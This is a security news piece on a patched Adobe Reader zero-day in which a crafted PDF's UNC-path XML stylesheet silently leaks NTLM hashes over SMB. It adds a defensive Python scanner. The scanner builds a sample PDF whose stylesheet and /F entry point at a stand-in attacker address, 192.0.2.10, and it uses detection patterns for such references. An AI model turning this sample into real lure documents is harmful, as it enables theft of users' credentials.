The zero-day vulnerability discovered in Adobe Reader has now been patched. Before the fix, an attacker could use it to capture NTLM authentication hashes from anyone who opened a crafted document.
The vulnerability was originally disclosed by Alex Inführ on 26 January. Because of the similarities, it has been widely compared to the earlier Bad PDF bug.
Technically, the flaw is not a defect in the reader's own code as such; it abuses the way PDF files embed external content. A crafted document makes Adobe Reader issue an SMB request to an attacker-controlled server automatically at the moment the document is opened.
Because Windows answers such a request with NTLM authentication, the attacker's server captures the victim's NTLM hash (strictly, an NTLM challenge-response that can be cracked offline or relayed) as soon as the file is opened. This is the "phoning home" technique: the attacker is alerted the instant the document is opened and harvests the hash in the same exchange.
The researchers note that the new zero-day is closely related to CVE-2018-4993, but it lives in a different place. Bad PDF relied on an /F entry to load a remote file; the new exploit instead makes the reader open an XML stylesheet over SMB. A remote stylesheet reference would normally trigger a security warning, but specifying the location as a UNC path sends the request out without one.
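As an added example, which is not part of the original article and not the researcher's proof of concept, the following Python script scans a PDF for the two document-side patterns described above: a /F entry holding a UNC path (the Bad PDF pattern) and an xml-stylesheet processing instruction whose href is a UNC path, including inside Flate-compressed streams, where XFA content usually sits. The sample document it builds is constructed here for the demonstration, and 192.0.2.10 is a documentation address standing in for an attacker's server.

```python
import re
import zlib

# Constructed sample input for this example (not a real document and not the
# researcher's proof of concept): an XFA stream whose xml-stylesheet processing
# instruction points at a UNC path. 192.0.2.10 is a documentation address.
XFA_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<?xml-stylesheet type="text/xsl" href="\\\\192.0.2.10\\share\\x.xsl"?>\n'
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"></xdp:xdp>\n'
)


def build_sample_pdf(xfa_xml=XFA_XML, include_f_entry=True):
    """Assemble a minimal PDF-like byte string around a Flate-compressed XFA stream.

    With include_f_entry=True it also carries a GoToR action whose /F string is a
    UNC path, the pattern the article attributes to Bad PDF, so both detection paths
    are exercised. Object offsets and the xref table are omitted; the scanner does
    not need them.
    """
    body = zlib.compress(xfa_xml)
    parts = [
        b'%PDF-1.7\n',
        b'1 0 obj << /Type /Catalog /AcroForm 2 0 R >> endobj\n',
        b'2 0 obj << /XFA 3 0 R >> endobj\n',
        b'3 0 obj << /Length ' + str(len(body)).encode() + b' /Filter /FlateDecode >>\n'
        b'stream\n' + body + b'\nendstream\nendobj\n',
    ]
    if include_f_entry:
        # In a PDF literal string a backslash is written as "\\", so the file holds
        # four backslashes for the leading "\\" of the UNC path.
        parts.append(
            b'4 0 obj << /Type /Action /S /GoToR '
            b'/F (\\\\\\\\192.0.2.10\\\\share\\\\doc.pdf) /D [0 /Fit] >> endobj\n'
        )
    parts.append(b'trailer << /Root 1 0 R >>\n%%EOF\n')
    return b''.join(parts)


STREAM = re.compile(rb'stream\r?\n(.*?)\r?\nendstream', re.S)
F_ENTRY = re.compile(rb'/F\s*\(((?:\\.|[^\\)])*)\)', re.S)
XML_STYLESHEET = re.compile(
    rb'<\?xml-stylesheet\b[^>]*?\bhref\s*=\s*["\']([^"\']+)["\']', re.I | re.S)


def extract_streams(pdf):
    """Return the payload of every stream object, inflating /FlateDecode streams."""
    out = []
    for m in STREAM.finditer(pdf):
        data = m.group(1)
        head = pdf[max(0, m.start() - 256):m.start()]  # the stream's own dictionary
        if b'/FlateDecode' in head:
            try:
                # decompressobj tolerates a missing zlib trailer, which matters for
                # hand-built or truncated streams
                data = zlib.decompressobj().decompress(data)
            except zlib.error:
                pass  # not valid zlib; scan the raw bytes instead
        out.append(data)
    return out


def _unescape_pdf_string(s):
    # Only the backslash escape matters here; octal escapes are left as they are.
    return re.sub(rb'\\(.)', rb'\1', s, flags=re.S)


def _is_remote(target):
    """True for UNC paths and SMB URLs, the forms that produce a silent SMB request."""
    t = target.strip().lower()
    return t.startswith(b'\\\\') or t.startswith(b'//') or t.startswith(b'smb:')


def scan_pdf(pdf):
    """Return (kind, target) pairs for every SMB/UNC reference in the file or its streams."""
    findings = []
    for blob in [pdf] + extract_streams(pdf):
        for m in F_ENTRY.finditer(blob):
            target = _unescape_pdf_string(m.group(1))
            if _is_remote(target):
                hit = ('F-entry', target.decode('latin-1'))
                if hit not in findings:
                    findings.append(hit)
        for m in XML_STYLESHEET.finditer(blob):
            target = m.group(1)
            if _is_remote(target):
                hit = ('xml-stylesheet', target.decode('latin-1'))
                if hit not in findings:
                    findings.append(hit)
    return findings


if __name__ == '__main__':
    for kind, target in scan_pdf(build_sample_pdf()):
        print(f'{kind}: {target}')
```

The scanner is a triage aid for mail gateways or incident response, not a substitute for patching: it only inspects Flate-compressed streams, so documents using other filters or object streams need a full PDF parser. Note that an http:// stylesheet is deliberately not flagged, since the article reports that such references still prompt the user; the silent path is the UNC one.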
Reportedly, older versions of Adobe Reader are affected as well, so updating as soon as possible is strongly encouraged. Until the update is applied, blocking outbound SMB (TCP port 445) at the network perimeter stops the captured hash from ever reaching an internet-based attacker, a mitigation that applies to this whole class of NTLM hash leaks.